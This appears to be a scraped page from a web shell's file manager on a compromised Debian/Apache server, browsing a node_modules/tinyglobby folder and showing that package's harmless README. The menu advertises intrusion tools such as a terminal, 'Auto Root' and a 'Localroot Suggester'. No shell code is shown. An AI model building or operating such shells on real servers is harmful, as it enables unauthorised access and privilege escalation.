Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
softmedya.net /
node_modules /
tinyglobby /
Delete
Unzip
Name
Size
Permission
Date
Action
.trash7206
[ DIR ]
drwxr-xr-x
2025-12-13 08:15
dist
[ DIR ]
drwxr-xr-x
2025-10-09 13:40
LICENSE
1.05
KB
-rw-r--r--
2025-10-09 13:40
README.md
932
B
-rw-r--r--
2025-10-09 13:40
package.json
1.78
KB
-rw-r--r--
2025-10-09 13:40
Save
Rename
# tinyglobby [](https://npmjs.com/package/tinyglobby) [](https://npmjs.com/package/tinyglobby) A fast and minimal alternative to globby and fast-glob, meant to behave the same way. Both globby and fast-glob present some behavior no other globbing lib has, which makes it hard to manually replace with something smaller and better. This library uses only two subdependencies, compared to `globby`'s [23](https://npmgraph.js.org/?q=globby@14.1.0) and `fast-glob`'s [17](https://npmgraph.js.org/?q=fast-glob@3.3.3). ## Usage ```js import { glob, globSync } from 'tinyglobby'; await glob(['files/*.ts', '!**/*.d.ts'], { cwd: 'src' }); globSync('src/**/*.ts', { ignore: '**/*.d.ts' }); ``` ## Documentation Visit https://superchupu.dev/tinyglobby to read the full documentation.